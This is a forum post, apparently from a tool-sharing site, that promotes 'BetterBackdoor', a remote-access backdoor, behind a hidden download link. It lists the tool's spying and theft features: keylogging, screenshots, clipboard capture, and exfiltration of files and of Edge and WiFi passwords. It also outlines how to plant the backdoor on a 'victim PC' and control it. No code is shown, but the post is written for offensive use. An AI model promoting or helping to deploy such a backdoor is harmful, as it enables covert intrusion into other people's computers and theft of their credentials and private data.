Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
SERVICE

Locked BetterBackdoor v1.13.1 - A backdoor with a multitude of features


itsMe

Recommended Posts

This is the hidden content, please

BetterBackdoor

A backdoor is a tool used to gain remote access to a machine.

Typically, backdoor utilities such as NetCat have 2 main functions: to pipe remote input into cmd or bash and output the response. This is useful, but it is also limited. BetterBackdoor overcomes these limitations by including the ability to inject keystrokes, get screenshots, transfer files, and many other tasks.

Features

BetterBackdoor can create and control a backdoor.

This created backdoor can:

    Run Command Prompt commands
    Run PowerShell scripts
    Run DuckyScripts to inject keystrokes
    Exfiltrate files based on the extension
    Exfiltrate Microsoft Edge and WiFi passwords
    Send and receive files to and from the victim’s computer
    Start a KeyLogger
    Get a screenshot of the victim’s computer
    Get text copied to victim’s clipboard
    Get contents from a victim’s file (cat)

This backdoor uses a client and server socket connection to communicate. The attacker starts a server and the victim connects to this server as a client. Once a connection is established, commands can be sent to the client in order to control the backdoor.

To create the backdoor, BetterBackdoor:

    Creates ‘run.jar’, the backdoor jar file, and copied it to directory ‘backdoor’.
    Appends a text file containing the server’s IPv4 address to ‘run.jar’.
    If desired, copies a Java Runtime Environment to ‘backdoor’ and creates batch file ‘run.bat’ for running the backdoor in the packaged Java Runtime Environment.

To start the backdoor on a victim PC, transfer all files from the directory ‘backdoor’ onto a victim PC.

If a JRE is packaged with the backdoor, execute run.bat, otherwise execute run.jar.

This will start the backdoor on the victim’s PC.

Once running, to control the backdoor you must return to BetterBackdoor and run option 1 at the start while connected to the same WiFi network as the victim’s computer.

Changelog v1.13.1

    Updated documentation
    Changed package name
    Fixed a bug with removing files

This is the hidden content, please

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.